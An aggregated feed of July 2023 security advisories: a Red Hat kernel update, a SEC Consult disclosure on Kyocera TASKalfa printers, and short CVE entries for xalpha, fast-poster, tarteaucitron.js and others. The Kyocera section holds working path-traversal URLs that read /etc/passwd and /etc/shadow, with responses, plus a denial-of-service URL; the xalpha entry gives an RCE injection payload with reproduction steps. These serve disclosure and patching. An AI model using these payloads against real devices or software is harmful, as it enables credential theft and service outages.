Red Hat Security Advisory 2023-4021-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include double free and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:4021-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4021  
Issue date:        2023-07-11  
CVE Names:         CVE-2022-3564   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.6  
Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.6) - noarch, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.6) - x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: use-after-free caused by l2cap_reassemble_sdu() in  
net/bluetooth/l2cap_core.c (CVE-2022-3564)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* The iscsi target deadlocks when the same host acts as an initiator to  
itself (i.e. connects via 127.0.0.1) (BZ#2183541)

* Double free issue in filelayout_alloc_commit_info (BZ#2212878)

* RHEL 7.2: XFS inode cluster corruption [rhel-7.9.z] (BZ#2213361)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2150999 - CVE-2022-3564 kernel: use-after-free caused by l2cap_reassemble_sdu() in net/bluetooth/l2cap_core.c

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.6):

Source:  
kernel-3.10.0-957.104.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-957.104.1.el7.noarch.rpm  
kernel-doc-3.10.0-957.104.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debug-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-devel-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-headers-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-tools-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-957.104.1.el7.x86_64.rpm  
perf-3.10.0-957.104.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
python-perf-3.10.0-957.104.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.6):

x86_64:  
kernel-debug-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-957.104.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-957.104.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrSXAAAoJENzjgjWX9erESlUP/0fvyxMdblwrZxJ9Mpsiak+f  
I5JKDhhBSu8gH1MG8BA+o2GhjjA8xUfF+stwK0kvyrh9BouDLuNtb1APHwwo5eBN  
OfZpxJquC0onbae4qVnxqJ5Vdl85Xa92dYO6PmiDczziKJcn9nQwD6asiKFVppz1  
56DuNYsB0te3yiHC2d6CAm7G2kIM9Q/toj9NbWiDg0VjHQRvU5Q199S9Ux8x66lz  
5zL9Wv6j03Gf/+kwmbyFWvnzJyammZHkORjBV9YQP4kcEmGZiGp5kglCR/wBNmpw  
S3DsWETnEvyigrFxqb6JkzjCE5X8BpsbKLJnHkccv8m8zBhwLXzbgA3AQFnYr0ky  
NtDXYeB7TBLAzQAX5uf/5kkFb6RrPPLz+JWV4wZWryFF3KPvj4Y9TAPbUV0JlBwq  
QFfO+qkQIOYdgiteVJyJZzgpSEEMWBDFI1HgZPD9puhpfalC+stX7nYmBctRZ6kW  
QU60EsACjQPbAKUYoG5NshacXTY5KJ9oaPDRZZfcekKLJ84ezhMOYIAq2RQ4dnqp  
hTAohuvNyuogaV02OVWUyGPN0nzXvWi11bTtIl82zKq5tZnHX8xQbKWjqx/e3xSn  
iopqNnKiijn+VtmBsSwBcbzacqyTL4xojiYEWoy3X6v0OkoSV2OQ30sdOl/BmbNI  
8UeKsoH8XOqGA9+DBst4  
=ZplL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4021-01

Kyocera TASKalfa 4053ci versions 2VG_S000.002.561 and below suffers from path traversal, user enumeration, and denial of service vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20230705-0 >  
=======================================================================  
               title: Path traversal bypass & Denial of service  
             product: Kyocera TASKalfa 4053ci printer  
  vulnerable version: TASKalfa 4053ci Version <= 2VG_S000.002.561  
       fixed version: 2VG_S000.002.574  
         CVE numbers: CVE-2023-34259, CVE-2023-34260, CVE-2023-34261  
              impact: High  
            homepage: https://global.kyocera.com  
               found: 2022-12-13  
                  by: Stefan Michlits (Office Vienna)  
                      Gorazd Jank (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Kyocera Document Solutions is leading the digital shift driving productivity  
and growth in the printing industry. We offer a range of exciting new options  
that draw on the combined resources of the Kyocera Group."

Source: https://www.kyoceradocumentsolutions.com/en/our-business/inkjet/

Business recommendation:  
------------------------  
SEC Consult recommends Kyocera customers to install the latest updates.

Furthermore, an in-depth security analysis performed by security professionals  
is highly advised, as the software may be affected from other security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Path Traversal - Bypass (CVE-2023-34259)  
A path traversal vulnerability was found by Hakan Eren ŞAN in 2020-06-06.  
The previous exploit can be found at: https://www.exploit-db.com/exploits/48561  
Kyocera has fixed the vulnerability. It was not possible to access arbitrary  
files using the public exploit. However, SEC Consult have found a bypass to  
exploit this vulnerability again and access arbitrary files. Due to the fact  
that the web service is running as the user root, it was possible to access all  
files (e.g. /etc/shadow) on the device.

2) Denial-of-Service - Web Interface (CVE-2023-34260)  
The denial-of-service vulnerability is related to the path traversal  
vulnerability. Instead of requesting a file, a directory will be requested.  
Once the request is sent to the web service running on TCP port 443, the web  
service will become unresponsive and must be restarted.

3) User Enumeration (CVE-2023-34261)  
The login function on the web service running on TCP port 443 is prone to a  
user enumeration vulnerability. The login function will return different  
responses, whether the username is valid or not.

Proof of concept:  
-----------------  
1) Path Traversal - Bypass (CVE-2023-34259)  
Previously, a security researcher has discovered an unauthenticated directory  
traversal vulnerability in the web service running on port 443. The following  
payload was used to access arbitrary files:

https://IP/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm

This vulnerability is fixed in the current version. It was not possible to  
access arbitrary files using the above payload. However, the vulnerability was  
not fixed correctly. SEC Consult identified a bypass to exploit this  
vulnerability again.

Once the ../ sequences will be URL encoded, it is possible to bypass the fix  
and access arbitrary files. The following payload can be used to access the  
file /etc/passwd:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm

The response containing the contents of the file /etc/passwd can be seen  
in the following paragraph.  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Content-Length: 770  
Accept-Encoding: identity  
Server: KM-MFP-http/V0.0.1  
Content-Type: text/html  
X-Frame-Options: SAMEORIGIN

root:x:0:0:root:/root:/bin/sh  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
sshd:x:100:1000:Linux User,,,:/var/run/sshd:/bin/false  
-------------------------------------------------------------------------------

Also, it was possible to access the file /etc/shadow. The following payload can  
be used:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow%00index.htm

The output containing the content of the file /etc/shadow as it can be seen in  
the following paragraph.  
-------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Content-Length: 401  
Accept-Encoding: identity  
Server: KM-MFP-http/V0.0.1  
Content-Type: text/html  
X-Frame-Options: SAMEORIGIN

root:$1$tfE2pkl/$O8uDq*************bSH.:11029::::::  
daemon:*:11029::::::  
bin:*:11029::::::  
sys:*:11029::::::  
sync:*:11029::::::  
games:*:11029::::::  
man:*:11029::::::  
lp:*:11029::::::  
mail:*:11029::::::  
news:*:11029::::::  
uucp:*:11029::::::  
proxy:*:11029::::::  
www-data:*:11029::::::  
backup:*:11029::::::  
list:*:11029::::::  
irc:*:11029::::::  
gnats:*:11029::::::  
nobody:*:11029::::::  
sshd:x:11029::::::  
-------------------------------------------------------------------------------  
As the web service is running as the user root it was possible to access the  
/etc/shadow file or the file has set the wrong permissions.

Based on previous security assessments of Kyocera printers, it is likely that  
the service is running as the user root.

2) Denial-of-Service - Web Interface (CVE-2023-34260)  
To trigger the DoS attack it is sufficient to navigate to the URL:

https://IP/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%00index.htm

Once the request is sent to the web service, the web service will become  
unresponsive.

This attack is related to the path traversal vulnerability. The difference is  
that in this case a folder is requested instead of a file. Apparently, this  
leads to an error condition in the web server causing it to be unresponsive for  
all users. Other applications offering a web interface (e.g., on port 8083)  
seem to not be affected by the attack.

3) User Enumeration (CVE-2023-34261)  
The user enumeration is located in the login functionality of the web  
interface. Submitting an existing username will result in a different server  
response than submitting an incorrect username. This enables attackers to  
enumerate existing users by submitting potential usernames till a different  
response is gathered. In this case, it does not matter whether the transmitted  
password is correct or not. The gathered information could be used to better  
search for default passwords or custom passwords inside of public password  
leaks.  
In case, the username does not exist, the response will return  
"Login-Benutzername oder Passwort falsch.", on the other hand, if the  
username exists the response contains "Sie können sich nicht einloggen."

Vulnerable / tested versions:  
-----------------------------  
The following product has been tested:  
* Kyocera TASKalfa 4053ci

All versions older than "2VG_S000.002.561" are vulnerable according to the vendor.

Vendor contact timeline:  
------------------------  
2023-02-13: Asking for Kyocera KC-SIRT security contact through Nippon CSIRT  
             Association; quick response: https://www.nca.gr.jp/member/kc-sirt.html  
             (it seems only the Japanese website shows the email information)  
2023-02-14: Contacting Kyocera KC-SIRT through kc-sirt@gp.kyocera.jp  
2023-03-02: Contacting the vendor again, due to no response.  
2023-03-06: Vendor response, KDC-PSIRT is responsible, requesting security advisory.  
2023-03-13: Sending security advisory PGP-encrypted.  
2023-04-19: Vendor response, vulnerabilities confirmed.  
2023-05-19: Vendor response, the vulnerabilities were fixed. The patch will be  
             released on 2023-05-26.  
2023-05-22: Informing vendor that we will request CVE numbers, asking for  
             information about affected & fixed version numbers.  
2023-05-24: Vendor provides version information.  
2023-06-02: Sending CVE numbers to vendor, asking for link to patch download.  
2023-06-05: Vendor provides download information.  
2023-07-05: Public release of security advisory.

Solution:  
---------  
The vendor provided the following download information:

There are two ways to update the firmware of our products.  
* One is to contact the shop of purchase and update the firmware from a service person.  
* The other is to use the Firmware Upgrade tool. From the Kyocera Document Solutions  
   Global website in your country, you can download this tool and latest firmware.  
   Then you update the firmware yourself.  
   See: https://www.kyoceradocumentsolutions.com/download/ and choose "TASKalfa4053ci"

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Michlits, G. Jank / @2023

Kyocera TASKalfa 4053ci 2VG_S000.002.561 Path Traversal / Denial Of Service

A vulnerability was found in IBOS OA 4.5.5. It has been classified as critical. Affected is the function createDeleteCommand of the file ?r=article/default/delete of the component Delete Packet. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-233574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-3621: cve/ibos oa.md at main · jack-521/cve

Cross-site Scripting (XSS) - Stored in GitHub repository amauric/tarteaucitron.js prior to v1.13.1.

**tarteaucitron.js vulnerable to Cross-site Scripting**

Moderate severity GitHub Reviewed Published Jul 11, 2023 to the GitHub Advisory Database • Updated Jul 11, 2023

GHSA-f44m-65h3-99vc: tarteaucitron.js vulnerable to Cross-site Scripting

xalpha v0.11.4 is vulnerable to Remote Command Execution (RCE).

**xalpha vulnerable to Remote Code Execution**

Moderate severity GitHub Reviewed Published Jul 11, 2023 to the GitHub Advisory Database • Updated Jul 11, 2023

GHSA-jx3q-5rgf-vrrr: xalpha vulnerable to Remote Code Execution

Expand Up

@@ -2083,7 +2083,13 @@ var tarteaucitron = {

return elem.getAttribute('height') || elem.clientHeight;

},

"getElemAttr": function (elem, attr) {

return elem.getAttribute('data-' + attr) || elem.getAttribute(attr);

var attribute \= elem.getAttribute('data-' + attr) || elem.getAttribute(attr);

  

if (typeof attribute \=== 'string') {

return tarteaucitron.fixSelfXSS(attribute);

}

  

return "";

},

"addClickEventToId": function (elemId, func) {

tarteaucitron.addClickEventToElement(document.getElementById(elemId), func);

Expand Down

CVE-2023-3620: Filter the attr to avoid possible XSS vulnerability Fix #1132 · AmauriC/tarteaucitron.js@c4c2fcf

Vulnerability Product: xalpha v0.11.4 ~ v0.11.8  
Vulnerability version: v0.11.4 ~ v0.11.8  
Vulnerability type: Remote Command Execute  
Vulnerability Details:  
Vulnerability location: xalpha/info.py -> fundinfo.\_basic\_init

without verifying the code user input and using dangerous function eval();, causes rce in xalpha v0.11.4 ~ v0.11.8 at xalpha/info.py -> fundinfo.\_basic\_init  

payload = ../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = {your rce python command}; &_=1688890155531#

test\_payload = ../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print('hacked'); &_=1688890155531#

let's take the latest version released in the Github v0.11.4 as an example  
firstly pip3 install xalpha==0.11.4

    pip3 install xalpha==0.11.4
    

secondly import xalpha

thirdly call xalpha.fundinfo("../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073\_ Data\_netWorthTrend = print('hacked'); &\_=1688890155531#")  
here take the test\_payload as argument of the function

xalpha.fundinfo("../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073\_ Data\_netWorthTrend = print('hacked'); &\_=1688890155531#")

folloing you could see, it successfully run the py code  

proved rce  
Also you can prove rce in version 0.11.8, but v0.11.4 is a stable version

reason:  
the self.url could be relocate path to / by ..  
  
if you input the test\_payload ../gaoduan/PinzhongRightApi.aspx?fc=AF5097&callback=jQuery183037745026472073073_ Data_netWorthTrend = print('hacked'); &_=1688890155531#, the path will be relocated to /gaoduan/PinzhongRightApi.aspx and callback, the re.match only check the body of response  
  
never check the position of data  
  
so causes rce

discovered by leeya\_bug

CVE-2023-37659: [Warning] RCE in xalpha v0.11.4 ~ v0.11.8 · Issue #175 · refraction-ray/xalpha

fast-poster v2.15.0 is vulnerable to Cross Site Scripting (XSS). File upload check binary of img, but without strictly check file suffix at /server/fast.py -> ApiUploadHandler.post causes stored XSS

Vulnerability Product:fast-poster v2.15.0  
Vulnerability version: v2.15.0  
Vulnerability type: Stored XSS  
Vulnerability Details:  
Vulnerability location: /api/upload

File upload check binary of img, but without strictly check file suffix at /server/fast.py -> ApiUploadHandler.post，causes stored XSS  

Firstly we preparing a image payload(contain javascript code last line)↓  
  
when you access the payload in image format, it is a img  
when you access the payload in html format, it will execute code  
payload : https://github.com/Leeyangee/leeya\_bug/blob/main/payload.jpg

build project or go to https://poster.prodapi.cn/#/, choose a random post such as  
  
click "上传"  
  
choose payload.jpg, before upload , turn on intercept (take burpsuite as an example)  
  
when uploading , change payload.jpg  
  
to payload.html  
  
forward it , turn off intercept

After all, go to the path store/upload/20230706/168beb5822ad77d9.html  
  
  
successfully proved stored xss

discoverd by leeya\_bug

CVE-2023-37658: [Warning] Stored XSS in fast-poster v2.15.0 · Issue #13 · psoho/fast-poster

An issue found in Marukyu Line v.13.4.1 allows a remote attacker to gain access to sensitive information via the channel access token in the miniapp function.

CVE-2023-31818: CVE-reports/CVE-2023-31818.md at main · syz913/CVE-reports

A vulnerability was found in SourceCodester Best POS Management System 1.0. It has been classified as critical. This affects an unknown part of the file admin_class.php of the component Login Page. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-233565 was assigned to this vulnerability.

Tag

#git